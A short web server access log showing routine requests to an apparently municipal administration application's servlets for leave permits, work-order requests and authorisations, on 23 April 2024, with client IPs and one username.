201.186.225.183 - - [23/Apr/2024:13:36:58 -0300] "GET /cormun/pexe_scrolldiv.js HTTP/1.1" 404 1009
190.171.143.98 - - [23/Apr/2024:13:36:59 -0300] "GET /cormun/servlet/permisogoce?8d550bee32deee3dae7cb996fcaa2a17839e6b4a224215609c554b2b22be4a36a87c94929500f2a2e367f56bb9f12de09df29d717a62da9c34f5dfae799da1ce,gx-no-cache=1713889996551 HTTP/1.1" 200 47
181.212.47.136 - - [23/Apr/2024:13:37:00 -0300] "POST /cormun/servlet/vesolicitudgral?6ed5c36b4cfc86359efd7976028e5d20,2024,21306,,SolicitudOTLog,gx-no-cache=1713889994794 HTTP/1.1" 200 90
181.212.47.136 - - [23/Apr/2024:13:37:00 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 972
181.212.47.136 - - [23/Apr/2024:13:37:00 -0300] "GET /cormun/servlet/trsolicitudgral? HTTP/1.1" 200 12070
201.186.225.183 - - [23/Apr/2024:13:37:01 -0300] "GET /cormun/servlet/veautorizarsolicitud?2024,21158,,SolicitudOTLog HTTP/1.1" 200 10547
201.186.225.183 - - [23/Apr/2024:13:37:01 -0300] "GET /cormun/pexe_scrolldiv.js HTTP/1.1" 404 1009
201.186.225.183 - - [23/Apr/2024:13:37:02 -0300] "POST /cormun/servlet/acontrolpreferencessavestate?None,CINOSTROZA,true HTTP/1.1" 200 35
190.171.143.98 - - [23/Apr/2024:13:37:04 -0300] "POST /cormun/servlet/permisogoce?99687d6e4d28e9bfbfba0f158cd834a5,INS,0,,,,gx-no-cache=1713890000352 HTTP/1.1" 200 93
190.171.143.98 - - [23/Apr/2024:13:37:04 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1022
190.171.143.98 - - [23/Apr/2024:13:37:04 -0300] "GET /cormun/servlet/trpermisosgoce?gx-no-cache=1713889952418 HTTP/1.1" 200 10485
201.186.225.183 - - [23/Apr/2024:13:37:06 -0300] "GET /cormun/servlet/trautorizarsolicitud? HTTP/1.1" 200 8842
190.171.143.98 - - [23/Apr/2024:13:37:09 -0300] "GET /cormun/servlet/trpermisosadjuntos?15805102,20240423123250,P, HTTP/1.1" 200 6642
